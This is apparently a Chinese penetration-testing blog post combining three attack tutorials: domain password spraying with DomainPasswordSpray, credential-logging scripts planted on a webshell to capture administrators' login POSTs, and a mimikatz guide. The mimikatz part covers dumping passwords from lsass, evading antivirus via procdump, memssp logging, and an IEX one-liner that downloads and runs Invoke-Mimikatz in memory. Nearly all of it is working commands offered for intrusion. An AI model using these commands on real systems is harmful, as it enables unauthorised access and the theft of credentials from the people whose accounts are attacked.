在拿到一台内网服务器之后，想要进行进一步的域渗透时，如果在内网中有着庞大的用户列表，你会怎么办？

powershell脚本

DomainPasswordSpray是一个powershell脚本，主要原理是先来抓取域用户账号，然后指定密码字典进行域认证。认证通过的就是密码正确的了。

Github地址

贴出了@倾旋大佬优化后的ps1脚本

简单使用

Invoke-DomainPasswordSpray -Password chabug

这个命令会从当前的域中生成用户列表，然后将每个用户名和chabug的密码组合进行枚举认证。

参数详解

• Domain 指定要测试的域名
• RemoveDisabled 尝试从用户列表删除禁用的账户
• RemovePotentialLockouts 删除锁定账户
• UserList 自定义用户列表(字典)。 如果未指定，这将自动从域中获取
• Password 指定单个密码进行口令测试
• PasswordList 指定一个密码字典
• OutFile 将结果保存到某个文件
• Force 当枚举出第一个后继续枚举，不询问

使用例子

C:\PS> Get-DomainUserList

该命令将从域中收集用户列表。

C:\PS> Get-DomainUserList -Domain 域名 -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt

该命令将收集域“域名”中的用户列表，包括任何未被禁用且未接近锁定状态的帐户。 它会将结果写“入“userlist.txt”文件中

C:\PS> Invoke-DomainPasswordSpray -Password Winter2016

该命令将会从域环境中获取用户名，然后逐个以密码Winter2016进行认证枚举

C:\PS> Invoke-DomainPasswordSpray -UserList users.txt -Domain 域名 -PasswordList passlist.txt -OutFile sprayed-creds.txt

该命令将会从users.txt中提取用户名，与passlist.txt中的密码对照成一对口令，进行域认证枚举，登录成功的结果将会输出到sprayed-creds.txt

希望对你的渗透之路有帮助。

本文引用或涉及的文章链接：

http://payloads.online/archivers/2018-05-02/1

http://payloads.online/scripts/Invoke-DomainPasswordSpray.txt

https://github.com/dafthack/DomainPasswordSpray

@X1r0z https://exp10it.cn/index.php/archives/1058/

写这些脚本主要是方便记录管理员的密码

通常为 md5+salt 或者为 强密码 无法解密

需要上传至 webshell

脚本均已在本地测试成功

在对应的 login 文件上 include 即可

默认保存在同目录下的 pass.txt 记录所有 POST 变量

php

asp

aspx

mimikatz是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码， lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中， 而mimikatz正是通过对lsass的逆算获取到明文密码！也就是说只要你不重启电脑，就可以通过他获取到登陆密码，只限当前登陆系统！

基本命令

cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::logonPasswords--获登陆用户信息及密码

实战抓取

只需要运行两条命令：

privilege::debug
sekurlsa::logonpasswords

我们也可以用powershell来抓取，仅需一条命令：

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

进阶

绕过杀软抓取密码

1. procdump

利用 procdump 导出 lsass.exe 在内存里的数据，之后 mimikatz 本地读取 操作系统版本要一致

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

1. Invoke-Mimikatz

内存中执行 不会在本地储存文件，前提是要支持 powershell

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

其他小技巧

若管理员有每过几天就改密码的习惯，但是mimikatz抓取到的密码都是老密码

用QuarksPwDump等抓的hash也是老hash，新密码却抓不到的情况下

可以使用以下方法尝试解决

privilege::debug
misc::memssp

记录的结果在c:\windows\system32\mimilsa.log
每次验证都会记录,如 锁屏 等 重启失效

出现如上问题是因为管理一直没注销过，都是直接断开连接，lsass进程里面还吃存放的老的。

也可以直接logoff，但是这样会很明显。

更多关于mimikatz妙用的文章：
Mimikatz 使用小技巧
如何防御“神器”Mimikatz窃取系统密码？
Blog de Gentil Kiwi
密码抓取神器 mimikatz